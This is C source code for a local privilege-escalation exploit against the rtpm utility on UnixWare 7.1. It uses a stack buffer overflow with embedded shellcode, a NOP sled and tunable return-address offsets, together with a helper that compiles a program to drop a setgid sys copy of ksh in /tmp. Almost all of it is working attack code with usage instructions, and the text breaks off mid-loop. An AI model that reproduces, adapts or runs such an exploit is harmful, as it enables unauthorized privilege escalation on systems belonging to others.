/** ** uwrtpm.c - UnixWare 7.1 rtpm exploit ** ** ** Drops a setgid sys shell in /tmp/ksh. We can't exec a shell because ** rtpm screws up our terminal when it exits abnormally. After running ** this exploit, you must forcefully exit your shell and re-login to exec ** your sys shell. ** ** cc -o uwrtpm uwrtpm.c; ./rtpm ** use offsets of +-100 ** ** Brock Tellier btellier@usa.net ** **/ #include #include char scoshell[]= "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/tmp/rt\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define ALIGN 3 #define LEN 1100 #define NOP 0x90 #define SYSSHELL "void main() {setregid(3,3);system(\"cp /bin/ksh /tmp/ksh; chgrp sys /tmp/ksh; chmod 2555 /tmp/ksh\"); } " void buildrt() { FILE *fp; char cc[100]; fp = fopen("/tmp/rt.c", "w"); fprintf(fp, SYSSHELL); fclose(fp); snprintf(cc, sizeof(cc), "cc -o /tmp/rt /tmp/rt.c"); system(cc); } int main(int argc, char *argv[]) { long int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2) { offset=atoi(argv[1]); } else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]); } else { offset=0; buflen=1100; } buildrt(); addr=0x8046a01 + offset; fprintf(stderr, "\nUnixWare 7.1 rtpm exploit drops a setgid sys shell "); fprintf(stderr, "in /tmp/ksh\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=((buflen/2) + strlen(scoshell))+ALIGN;i